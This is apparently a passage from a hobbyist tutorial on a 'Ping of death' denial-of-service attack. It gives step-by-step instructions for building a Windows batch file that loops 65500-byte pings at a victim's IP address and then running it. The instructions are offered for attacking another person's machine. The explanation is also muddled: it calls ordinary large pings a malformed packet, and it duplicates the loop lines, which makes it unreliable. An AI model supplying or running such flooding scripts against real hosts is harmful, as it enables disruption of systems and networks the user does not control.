Well, that’s the negative side of the ping packet. When we increase the size of the ping packet unnaturally, forming a malformed ping packet to attack a computer system, this type of attack is called “Ping of death” attack.
Not wasting much time;
Here are the steps to perform an ping attack:
- Open Notepad
- Copy the following text on the notepad
:loop
ping 192.168.32.13 -l 65500 -w 1 -n 1
goto :loop
ping 192.168.32.13 -l 65500 -w 1 -n 1
goto :loop
In the above command, replace 192.168.32.13 with victims IP address.
- Save the Notepad with any name. Let’s say dos.txt
- Right click on the dos.txt and click on rename.
- Change the extension from .txt to .bat
- So, now the file name should be dos.bat
- Double click on it and you will see a command prompt running with a lot of pings.







